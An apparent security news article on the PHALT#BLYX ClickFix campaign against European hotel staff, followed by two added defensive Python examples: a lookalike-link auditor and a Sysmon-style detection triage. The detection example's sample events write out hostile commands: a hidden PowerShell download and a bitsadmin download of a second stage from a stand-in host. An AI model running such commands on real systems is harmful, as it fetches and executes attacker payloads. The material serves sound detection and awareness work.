
    Sophisticated ‘ClickFix’ Malware Campaign Uses Fake Windows Crash Screens To Trick Users Into Running Malicious Code

    A sophisticated and highly deceptive cyberattack is currently sweeping through the European hospitality industry, tricking hotel staff into executing malware on their own systems by mimicking familiar system crashes and trusted brands — a blend of psychological manipulation and technical subterfuge that has cybersecurity experts warning of a dangerous new trend in social engineering.

    The campaign, tracked by threat researchers at security firm Securonix under the code name PHALT#BLYX, was first observed in December 2025 and has rapidly evolved into a multi-stage infection chain that leverages phishing, brand impersonation, fake system errors, and legitimate Microsoft tooling to bypass traditional defenses and deliver a remote access trojan (RAT) onto compromised systems.

    Phishing Emails Trigger the Attack

    The operation’s initial access vector is a classic spear-phishing email that appears to come from Booking.com, one of the world’s largest online travel platforms. These emails notify recipients — typically hotel reservation staff — of a large reservation cancellation or unexpected charge and instruct them to click a link to view details. The lure is carefully crafted to induce urgency, often citing amounts over €1,000 to spur immediate action.

    [Figure: phishing email lure. Source: Securonix]

    When the recipient follows the embedded link, they’re redirected to a nearly perfect clone of the Booking.com website hosted on a malicious domain such as low-house[.]com. According to Securonix, this imitation is a “high-fidelity clone,” using official logos, fonts, and colours to deceive even cautious users.
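A first line of defence against this lure is checking where a link actually goes before anyone clicks it. The following is an added example (not code from the article or from Securonix) that extracts every URL from a message body and classifies it against the brand's real registrable domain: anything on booking.com is trusted, a host that merely contains the brand name (subdomain padding, hyphenated lookalikes) is flagged as a lookalike, and everything else is external. The sample email, the `.example` hosts and the two-label "registrable domain" shortcut are constructed for this example; the shortcut is adequate for a .com brand but would need a public-suffix list for country-code domains.

```python
import re
from urllib.parse import urlparse

# Constructed sample message for this example; it is not a real PHALT#BLYX email.
# low-house.com is the clone host named in the Securonix report; the other hosts
# are made-up .example names.
SAMPLE_EMAIL = """\
Dear Partner,
A reservation worth EUR 1,240 was cancelled. Review the details here:
https://www.booking.com/myreservations.html
If the page fails to load, use the mirror: https://low-house.com/booking/refresh
Reset your extranet password: https://account.booking.com.secure-login.example/reset
Guest message: https://booking-partner-support.example/view
"""

# Registrable domains the organisation actually trusts for this brand.
TRUSTED = {"booking.com"}

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def registrable_domain(host: str) -> str:
    """Last two labels of the host (simplification: no public-suffix list)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_url(url: str) -> str:
    """'trusted' if the link really lands on the brand, 'lookalike' if the brand
    name appears in a host that is not the brand's, else 'external'."""
    host = (urlparse(url).hostname or "").lower()
    if registrable_domain(host) in TRUSTED:
        return "trusted"
    brand_words = {d.split(".")[0] for d in TRUSTED}
    if any(word in host for word in brand_words):
        return "lookalike"
    return "external"


def audit_links(text: str) -> list[tuple[str, str]]:
    """Every URL in the text paired with its classification."""
    return [(url, classify_url(url)) for url in URL_RE.findall(text)]


def suspicious_links(text: str) -> list[str]:
    """URLs a reservations desk should not follow from an unsolicited email."""
    return [url for url, verdict in audit_links(text) if verdict != "trusted"]


if __name__ == "__main__":
    for url, verdict in audit_links(SAMPLE_EMAIL):
        print(f"{verdict:9s} {url}")
```

Running it on the sample prints one trusted link and three that should be verified through a separate channel, which is the point of the "click nothing until confirmed" rule for refund and cancellation notices.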

    Fake Errors and BSODs: Turning Curiosity Into Compromise

    [Figure: cloned Booking.com page. Source: Securonix]

    Once on the spoofed site, the victim will encounter a staged “Loading is taking too long” error that prompts them to click a refresh button. Instead of simply reloading, the browser switches into full-screen mode and displays a fake Windows Blue Screen of Death (BSOD) animation — a critical element of the so-called ClickFix social engineering tactic.

    [Figure: fake Windows BSOD with "fix" instructions. Source: Securonix]

    Unlike legitimate BSOD screens, which only display error codes and instruct users to reboot, the fake BSOD in this attack actively tells users how to “fix” the problem. It guides them to open the Windows Run dialog box (Windows + R), press CTRL+V (pasting a command already copied to the clipboard), and then hit Enter. This action causes the user’s computer to execute a malicious PowerShell command — effectively turning victims into unwitting accomplices in the compromise of their own systems.

    Living off the Land: Abusing Trusted Tools for Malware Delivery

    The cleverness of the PHALT#BLYX campaign lies not only in its psychological ploys but also in its use of legitimate system tools to evade detection. Once the PowerShell command is executed, it downloads a .NET project file (typically named v.proj) and uses MSBuild.exe, a trusted Microsoft utility, to compile and run it. This “living off the land” (LotL) technique allows the malware to bypass many security products that flag unknown binaries but trust system-signed components.

    After compilation, the malware:

    • Adds exclusions to Windows Defender to evade detection
    • Attempts to elevate privileges by triggering repeated User Account Control (UAC) prompts
    • Downloads additional payloads via the Background Intelligent Transfer Service (BITS)
    • Establishes persistence by placing shortcut files into the user’s Startup folder
    • Executes the final payload, a Remote Access Trojan known as DCRat (Dark Crystal RAT)

    [Figure: infection chain overview. Source: Securonix]

    Researchers noted that if administrative privileges are not immediately granted, the malware will repeatedly prompt for them — using victim frustration as a secondary social engineering vector to obtain elevated rights.
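Each stage described above (the pasted Run-dialog command, PowerShell fetching a project file, MSBuild.exe compiling it from a user-writable path, the Defender exclusion, the BITS download and the Startup-folder shortcut) leaves a distinct trace in endpoint telemetry, and the chain is far easier to spot as a sequence than as any single event. The following is an added example, not code from the article or from Securonix, of that correlation logic run over a handful of constructed Sysmon-style events. The event shape (`id`, `image`, `parent`, `cmdline`, `target`, `details`), the `phish.example` host and the `front-desk` user are assumptions for this example; the registry paths (Explorer `RunMRU`, `Windows Defender\Exclusions`) and the event ids (1 = process creation, 11 = file created, 13 = registry value set) are real Sysmon conventions.

```python
import re
from typing import Iterable

# Constructed sample telemetry in a simplified Sysmon-like shape (field names are
# an assumption for this example, not a real log schema).
SAMPLE_EVENTS = [
    # benign baseline
    {"id": 1, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    # Run-dialog history: the pasted ClickFix command is recorded in RunMRU
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "details": r'powershell -w hidden -c "iwr http://phish.example/v.proj -OutFile $env:TEMP\v.proj"\1'},
    # PowerShell started from the Run dialog, so its parent is explorer.exe
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://phish.example/v.proj -OutFile $env:TEMP\v.proj"'},
    # MSBuild compiling a project file that lives in %TEMP%
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"MSBuild.exe C:\Users\front-desk\AppData\Local\Temp\v.proj"},
    # Defender path exclusion written for the staging directory
    {"id": 13, "target": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\front-desk\AppData\Local\Temp",
     "details": "DWORD (0x00000000)"},
    # BITS used to fetch a second stage
    {"id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"bitsadmin /transfer job /download http://phish.example/stage2.bin C:\Users\front-desk\AppData\Local\Temp\stage2.bin"},
    # persistence: shortcut dropped into the user's Startup folder
    {"id": 11, "target": r"C:\Users\front-desk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    # a legitimate developer build for contrast; must not fire the MSBuild rule
    {"id": 1, "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
]

USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public|ProgramData)\\", re.IGNORECASE)
INTERPRETERS = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript)\b", re.IGNORECASE)
DOWNLOADER = re.compile(r"-w(indowstyle)?\s+hidden|\biwr\b|invoke-webrequest|downloadstring", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[str]:
    """Return the names of every rule a single event matches."""
    hits = []
    eid = ev.get("id")
    if eid == 13:
        target = ev.get("target", "")
        if re.search(r"\\Explorer\\RunMRU\\", target, re.IGNORECASE) and INTERPRETERS.search(ev.get("details", "")):
            hits.append("run_dialog_interpreter")
        if re.search(r"\\Windows Defender\\Exclusions\\", target, re.IGNORECASE):
            hits.append("defender_exclusion_added")
    elif eid == 1:
        img = image_name(ev.get("image", ""))
        parent = image_name(ev.get("parent", ""))
        cmd = ev.get("cmdline", "")
        if img == "msbuild.exe" and re.search(r"\.(proj|csproj|xml)\b", cmd, re.IGNORECASE) and USER_WRITABLE.search(cmd):
            hits.append("msbuild_project_from_user_writable_path")
            if parent in ("powershell.exe", "pwsh.exe", "cmd.exe"):
                hits.append("msbuild_spawned_by_shell")
        if (img == "bitsadmin.exe" and "/download" in cmd.lower()) or "start-bitstransfer" in cmd.lower():
            hits.append("bits_download")
        if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" and DOWNLOADER.search(cmd):
            hits.append("powershell_from_explorer_downloader")
    elif eid == 11:
        if re.search(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", ev.get("target", ""), re.IGNORECASE):
            hits.append("startup_shortcut_dropped")
    return hits


def triage(events: Iterable[dict]) -> dict:
    """Run every event through the rules and summarise the host."""
    fired = [(idx, rule) for idx, ev in enumerate(events) for rule in check_event(ev)]
    distinct = sorted({rule for _, rule in fired})
    # Several distinct stages on one host is the signal; a single rule alone
    # (a real developer running MSBuild, say) only merits a look.
    verdict = "likely_clickfix_chain" if len(distinct) >= 3 else ("review" if distinct else "clean")
    return {"hits": fired, "rules": distinct, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for idx, rule in result["hits"]:
        print(f"event[{idx}] -> {rule}")
    print("verdict:", result["verdict"])
```

The threshold of three distinct stages is the design choice worth tuning: the RunMRU and explorer-to-PowerShell rules alone already describe the ClickFix moment, while the MSBuild rule needs the user-writable-path condition so that genuine developer builds stay quiet.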

    DCRat: Full Remote Access and Secondary Payloads

    Once active, the DCRat payload is capable of deep system exploitation. After establishing contact with a command-and-control (C2) server, it sends detailed system fingerprints and lies in wait for further instructions. Its capabilities include:

    • Remote desktop control
    • Reverse shell command execution
    • Silent keylogging
    • Memory-only execution of additional payloads

    In at least one observed incident, the attackers deployed a cryptocurrency miner as a secondary payload, using the compromised host’s computing resources for financial gain.

    Attribution and Broader Threat Landscape

    Security analysts have signalled potential links between this campaign and Russian-linked threat actors, citing the use of Russian language artifacts within the compiled MSBuild project files and other operational indicators. The focus on room charges in Euros also supports the assessment that Europe’s hospitality sector was specifically targeted during its busiest holiday season.

    This isn’t the first time attackers have used Booking.com as a lure in phishing scams. Earlier reports documented similar campaigns abusing Booking.com branding to steal credentials or deliver malware, including credential stealers and other RAT families.

    Why This Attack Is Dangerous

    Unlike many automated malware campaigns that rely on unskilled victims opening malicious attachments, the PHALT#BLYX attack manipulates users into executing commands themselves. This human-driven compromise method can easily bypass traditional security controls, such as automated script blockers or sandboxing technologies, because the malicious action originates from user intent — albeit based on deception.

    Security experts characterize such campaigns as social engineering on steroids due to their layered psychological manipulation combined with sophisticated technical execution. The use of trusted tools, fake system errors, and branded phishing lures represents an evolution in attacker tactics — shifting away from blunt force exploits to nuanced deception that leverages trust and urgency.


    Mitigation and Recommendations

    Organisations, especially in the hospitality sector, should step up both technical and workforce defences:

    • Phishing Awareness Training: Staff should be trained to recognize social engineering tactics beyond simple “click this link” scams, including deceptive error prompts and unusual instructions.
    • Multi-Factor Verification: Critical actions like handling customer refunds or cancellations should be verified through separate channels before clicking links in emails.
    • Endpoint Monitoring: Behavioural detection tools can flag unusual PowerShell command executions or suspicious use of MSBuild.exe.
    • Privilege Restrictions: Limiting admin rights and enforcing strict UAC approval policies can help reduce the impact of similar attacks.

    Conclusion

    The PHALT#BLYX campaign represents a potent combination of psychological trickery and technical sophistication, exploiting both human trust and trusted system components to successfully infect targets in a critical economic sector. As social engineering tactics continue to evolve and blend with advanced “living off the land” techniques, organisations and security teams must similarly adapt their awareness, training, and detection strategies to stay ahead of ever-more convincing threats.

    About Securonix

    Founded in 2008 and headquartered in Addison, TX, Securonix is a cybersecurity platform specializing in identifying, analyzing, and responding to security threats. It uses analytics to provide visibility into network activities, aiming to detect suspicious behavior before it manifests into a breach.
